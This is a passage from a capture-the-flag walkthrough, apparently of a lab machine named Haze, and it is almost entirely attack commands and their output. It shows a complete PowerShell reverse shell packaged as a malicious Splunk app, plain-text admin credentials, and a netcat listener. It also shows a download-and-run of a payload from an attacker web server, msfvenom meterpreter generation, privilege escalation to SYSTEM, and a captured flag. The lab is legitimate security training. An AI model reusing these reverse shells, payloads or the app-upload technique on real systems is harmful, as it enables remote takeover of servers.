[os.dup2(s.fileno(),fd) for fd in (0,1,2)]
pty.spawn('/bin/bash')
┌──(kali ㉿kali)-[~/Desktop/reverse_shell_splunk/reverse_shell_splunk/bin]
└─$ cat run.ps1
#A simple and small reverse shell. Options and help removed to save space.
#Uncomment and change the hardcoded IP address and port number in the below line. Remove all help comments a
s well.
#$client = New-Object System.Net.Sockets.TCPClient('attacker_ip_here',attacker_port_here);$stream = $client.GetS
tream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-
Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String
);$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback
2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
$client = New-Object System.Net.Sockets.TCPClient('10.10.14.x',4444);
$stream = $client.GetStream();
[byte[]]$bytes = 0..65535|%{0};
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
$sendback = (iex $data 2>&1 | Out-String );
$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
$stream.Write($sendbyte,0,$sendbyte.Length);
$stream.Flush()
Haze 19
};
$client.Close()
┌──(kali ㉿kali)-[~/Desktop/reverse_shell_splunk]
└─$ tar -cvzf reverse_shell_splunk.tgz reverse_shell_splunk
reverse_shell_splunk/
reverse_shell_splunk/bin/
reverse_shell_splunk/bin/run.ps1
reverse_shell_splunk/bin/run.bat
reverse_shell_splunk/bin/rev.py
reverse_shell_splunk/default/
reverse_shell_splunk/default/inputs.conf
┌──(kali ㉿kali)-[~/Desktop/reverse_shell_splunk]
└─$ mv reverse_shell_splunk.tgz reverse_shell_splunk.spl
┌──(kali ㉿kali)-[~/Desktop/reverse_shell_splunk]
└─$
total 20
-rw-rw-r-- 1 kali kali 1810 Mar 29 23:48 README.md
drwxrwxr-x 4 kali kali 4096 Mar 29 23:48 reverse_shell_splunk
-rw-rw-r-- 1 kali kali 1034 Mar 30 00:40 reverse_shell_splunk.spl
user: admin
password
: Sp1unkadmin@2k24
ichiga kirgandan keyin app > manage > install app from file. keyin reverse_shell_splunk.spl upload qilamiz
Haze 20
┌──(kali ㉿kali)-[~/Desktop/reverse_shell_splunk]
└─$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.198] from (UNKNOWN) [10.10.11.61] 51701
PS C:\Windows\system32> whoami
haze\alexander.green
PS C:\Windows\system32> iwr http://10.10.14.x:8000/shell.exe -OutFile C:\users\public\shell.exe
=======================================================================
┌──(kali ㉿kali)-[~/Desktop/reverse_shell_splunk]
└─$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.x LPORT=5555 -f exe -o shell.exe
PS C:\users\public> ./shell.exe
==================================================================================
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 10.10.14.x
LHOST => 10.10.14.x
msf6 exploit(multi/handler) > set LPORT 5555
LPORT => 5555
msf6 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 10.10.14.x:5555
[*] Sending stage (203846 bytes) to 10.10.11.61
[*] Meterpreter session 1 opened (10.10.14.x:5555 -> 10.10.11.61:51754) at 2025-03-30 00:49:33 -0400
meterpreter >
meterpreter > getsystem
Haze 21
(c) Microsoft Corporation. All rights reserved.
C:\users\public>whoami
whoami
nt authority\system
C:\users\public>cd ../administrator/desktop
cd ../administrator/desktop
C:\Users\Administrator\Desktop>type root.txt
type root.txt
900dc84bcaed8c08c3aac7ad55e86ed9
C:\Users\Administrator\Desktop>
Haze 22